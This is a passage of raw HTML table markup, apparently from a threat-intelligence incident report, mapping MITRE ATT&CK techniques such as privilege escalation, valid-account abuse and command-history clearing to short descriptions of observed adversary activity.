class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="739653697" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{135}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: normal; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary escalated to SYSTEM level privileges, which may have provided access to cached credentials in memory or registry hive.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1502470987" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{142}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: normal; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="19" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="1325599272" paraeid="{9ac54ef9-9658-45d3-928a-f2f03b27d238}{1}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="107799647" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{150}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1548: Abuse Elevation Control Mechanism</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1973040168" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{157}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: normal; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary used<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">ExecutionPolicy</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>Bypass in PowerShell and<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">attempted</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>to add users to the local Administrators group.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="119805646" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{164}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: normal; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="20" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="1938890427" paraeid="{9ac54ef9-9658-45d3-928a-f2f03b27d238}{5}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: normal; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="531330934" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{172}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: normal; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1078</span></span><span class="TabRun IPSelectionBlob BlobObject DragDrop SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; display: inline-block; font-family: Calibri, sans-serif; font-size: 10pt; font-style: normal; font-weight: 400; position: relative; text-indent: 0px; white-space: nowrap; text-align: left; width: 0px; color: windowtext; -webkit-nbsp-mode: normal !important;"><span class="TabChar SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; display: inline-block; white-space: pre !important; -webkit-nbsp-mode: normal !important;">	</span><span class="TabLeaderChars SCXW67619765 BCX4" aria-hidden="true" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; display: inline-block; left: 0px; position: absolute; top: 0px; white-space: pre !important; -webkit-nbsp-mode: normal !important;"></span></span><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: normal; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Valid Accounts</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1640571244" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{183}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: normal; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary bypassed standard access controls by using compromised accounts with existing high-level privileges.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1988849919" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{190}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: normal; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="21" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1036814734" paraeid="{7e232229-90d8-47c0-97dd-10025f6759db}{107}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Defense evasion</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1618131671" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{220}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1070.003: Indicator Removal on Host: Clear Command History</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="329934886" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{227}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, 